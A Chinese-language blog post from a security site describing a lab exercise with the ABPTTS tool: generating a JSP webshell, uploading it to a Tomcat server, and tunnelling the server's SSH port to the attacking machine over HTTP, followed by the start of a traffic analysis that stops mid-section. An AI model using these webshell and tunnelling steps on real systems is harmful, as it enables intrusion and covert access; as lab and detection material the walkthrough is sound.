0x001
各位朋友们好,这是我第一次发技术文章,如果有不对的地方,欢迎各位大佬前来指教
环境:
攻击机kali 192.168.125.129
靶机 内网Centos7 Tomcat 192.168.125.134
内网kali 192.168.125.135
步骤一:环境配置
在攻击机上安装python2模块
1.首先验证pip版本
pip –version
2.如果显示为pip2继续安装没款,如不是pip2或者无pip2,先去安装pip2
pip install pycrypto
pip install httplib2
步骤二:攻击过程
在攻击机上用git命令把github上的ABPTTS包拉取下来
1.git clone https://github.com/nccgroup/ABPTTS.git
2.进入ABPTTS文件目录下
cd ABPTTS
3.使用python abpttsfactory.py -o webshell生成对应webshell,会在当前目录下生成webshell 文件,里面存放着jsp和aspx的webshell文件
4.把生成的webshell上传到web服务器上(由于此处为演示,使用的是scp上传)
5.浏览器访问http://192.168.125.134:8081/abptts.jsp,如下图所示为成功
6.用Centos Tomcat 通过ssh 链接内网kali
7.执行 python abpttsclient.py -c webshell/config.txt -u http://192.168.
125.134:8081/abptts.jsp -f 127.0.0.1:1234/127.0.0.1:22目的是把centos tomcat的22端口 映射到攻击机的1234端口
8.在攻击机上使用ssh链接127.0.0.1:1234就直连到centos tomcat机器上了
步骤三:流量分析
1.使用wireshark进行抓包发现此隧道是走http协议,特征如下
来源:freebuf.com 2021-01-05 15:13:03 by: chris1200tw
请登录后发表评论
注册